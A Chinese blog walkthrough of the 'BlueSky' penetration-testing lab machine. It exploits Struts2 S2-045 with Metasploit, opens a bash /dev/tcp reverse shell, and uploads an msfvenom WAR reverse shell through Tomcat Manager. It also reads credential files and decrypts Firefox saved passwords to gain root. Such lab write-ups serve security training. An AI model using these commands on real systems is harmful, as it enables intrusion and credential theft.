bluesky

已于 2023-10-04 15:27:40 修改
阅读量97 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全 linux 服务器
于 2023-10-04 14:38:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133552066
版权

靶机 BlueSky

信息搜集

存活检测

image-20230930150506031

详细扫描

  • 发现开放了 22 端口和 8080 端口

    image-20230930155034507

  • 访问 8080 端口

    在这里插入图片描述

    查看源代码未发现有用信息

  • 后台扫描image-20230930152239606

  • 无有用信息

漏洞复现

  • 搜索漏洞,存在 struts 远程代码执行漏洞

    路径 http://192.168.245.144:8080/struts2-showcase/index.action

    image-20230930155855695

  • 启动漏洞扫描工具 vulmap

    python3 vulmap.py

    image-20230930175547586

    搜索 struts 漏洞

    python3 vulmap.py -u http://192.168.245.144:8080/struts2-showcase/index.action -a struts2

    image-20230930180216058

    显示存在漏洞

  • msf 搜索漏洞

    search s2-045

    image-20230930180408207

  • 配置并运行

    image-20230930180541277

    成功连接

    image-20230930180610535

  • 反弹 shell

    bash -c 'bash -i >& /dev/tcp/192.168.245.128/8888 0>i'

Webshell

  • 查看viminfo文件 在vim中操作的行为,vim会自动记录下来,保存在 .viminfo 文件中。

    image-20230930194149116

  • 查看 /usr/local/tomcat/conf/tomcat-users.xml

    cat /usr/local/tomcat/conf/tomcat-users.xml

    获得了 admin 的账号密码

    image-20230930194259902

  • 登录 manager app

    image-20230930194408091

    输入账号 admin 密码 6mzf3>gfZ.pN8_Mp

  • 登陆成功

    image-20230930195205785

  • 尝试文件上传反弹 shell

    image-20230930195357043

  • 生成后缀未 war 的反弹文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.245.128 LPORT=8888 -f war -o shell.war

    image-20230930200541186

  • 上传成功

    image-20230930200807960

  • 开启监听,点击 shell.war 连接

    image-20230930200853303

提权

  • 提示符回显

    /usr/bin/script -qc /bin/bash /dev/null

    image-20230930201323226

mozilla firefox信息收集

  • 发现 Firefox 文件 .mozilla

    image-20230930202059307

  • 查找用户密码文件

    image-20230930202314684

  • 将两个文件下载到 kali 进行解密

    python3 -m http.server 6666

    image-20230930202558526

  • kali 下载

    wget http://192.168.245.144:6666/key4.db
wget http://192.168.245.144:6666/logins.json

    image-20230930202727531

密码解密

  • 下载解密脚本

  • 查看用法

    image-20230930203506058

  • 下载依赖文件

    pip3 install -r rewuirements.txt

    image-20230930203712797

  • 将 key4.db 和 logins.json 复制到 firepwd.py 同目录下

  • 运行 firepwd 文件

    python firepwd.py

  • 得到账号 minhtuan 密码 skysayohyeah

    image-20230930204221594

  • sudo -l 查看权限

    输入密码

    image-20230930204510074

  • 拥有全部 root 权限

  • 提权

    sudo bash

    image-20230930204621547

    提权成功

gjl_
关注
专栏目录
Blue Moon后台管理模板
11-24
Blue Moon后台管理模板是一款适合微信公众平台后台的蓝色清爽风格模板。
推特创始人发布全新社交应用程序 Bluesky,注册步骤图解
qq_57728300的博客
11-04 640
Bluesky 是一款由推特创始人全新发布的社交应用程序。
react-mobx-admin:基于React的admin应用程序的未定义框架
05-03
react-mobx-admin 将ReactJS管理GUI添加到任何RESTful API。 受基于启发,基于React的Admin应用程序的非标准框架。 但这使用进行状态管理。 并旨在扩展性和代码的可读性和简单性。 看看自己的表示例, 技术细节 它是原始的ES6库,因此您需要具有打包功能的打包程序(带有babel加载程序的webpack)。 自己尝试: git clone https://github.com/blueskydigital/react-mobx-admin cd react-mobx-admin npm i make run 现在可以在找到该应用程序。
好用的VUE后台管理框架/vueUI框架
BLUESKYHOST的博客
05-20 646
Vue RuoYi 官方演示地址 vue2.0、element-ui Ant Design Vue 官方演示地址 个人项目演示地址 Vue3.0、Vite、 Ant-Design-Vue https://github.com/anncwb/vue-vben-admin 私人项目地址 iView 官方演示地址 vue2.0 React ant.design 官方演示地址 react 16.12.0 以上。目前是全球第一的开源UI项目 ...
Bluesky数据采集框架-1
yuyuyuliang00的博客
02-24 2042
Bluesky数据采集框架-1
Bluesky数据采集框架-6
yuyuyuliang00的博客
03-01 717
Bluesky数据采集框架-6
Bluesky数据采集框架-4
yuyuyuliang00的博客
02-27 813
Bluesky数据采集框架-4
Bluesky数据采集框架-ophyd新手入门
yuyuyuliang00的博客
02-29 1010
Bluesky数据采集框架-ophyd新手入门
Bluesky数据采集框架-5
yuyuyuliang00的博客
02-28 901
Bluesky数据采集框架-5
linux上安装bluesky的步骤
yuyuyuliang00的博客
02-20 1846
5、在安装后,初始化你新安装地minconda。9、确保pip,setuptools和numpy是最新的。13、启动jupyter。
去中心化社交平台Bluesky源码
02-20
Bluesky是一款基于去中心化理念构建的社交平台,它的核心设计目标是打破传统社交网络的集中式架构,提供一个用户数据所有权、隐私保护和言论自由更为强化的环境。源码的开放使得开发者和社区成员可以深入理解其工作...
epics-bluesky-vm:使用EPICS IOC,GUI,Bluesky和相关组件模拟光束线
03-29
在这个项目"epics-bluesky-vm"中,我们看到的是一个利用EPICS IOC(Input/Output Controller)、图形用户界面(GUI)、Bluesky以及相关组件来模拟光束线环境的虚拟机设置。 首先,EPICS IOC是EPICS系统的核心部分,...
BlueSky-开源
05-28
BlueSky-开源】是一款基于C#开发的开源软件,主要功能是演示如何将MySQL数据库与C#编程语言高效地集成在一起,实现协同工作的软件解决方案。这个项目为开发者提供了一个学习和实践数据库集成、C#编程以及协同工作...
PyPI 官网下载 | bluesky-1.6.0-py3-none-any.whl
02-14
**PyPI官网下载 | bluesky-1.6.0-py3-none-any.whl** PyPI,全称为Python Package Index,是Python社区官方的软件包仓库。它为Python开发者提供了一个发布、查找和安装第三方Python模块的平台。在这个场景中,我们...
BlueSky-IOC
07-26
"BlueSky-IOC"是一个基于Java的依赖注入框架,它在0.5M1版本中提供了更为优化的组件管理和服务定位功能。这个框架借鉴了Spring等成熟IoC(Inversion of Control,控制反转)框架的设计理念,旨在简化应用程序的开发...
Bluesky数据采集框架-7
yuyuyuliang00的博客
03-06 546
Bluesky数据采集框架-7
Bluesky数据采集框架-3
yuyuyuliang00的博客
02-26 1204
Bluesky数据采集框架-3
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
linux长时间运行任务中断报警trap
最新发布
djl的专栏,blog.djl.cx好记
11-08 280
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
Python库bluesky_live最新版本发布
资源摘要信息:"PyPI 官网下载 | bluesky_live-0.0.5-py3-none-any.whl" 1. PyPI 简介: PyPI,全称 Python Package Index,是 Python 的官方包库,也被称作 Cheese Shop,这是一个存储和分发 Python 软件包的仓库...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值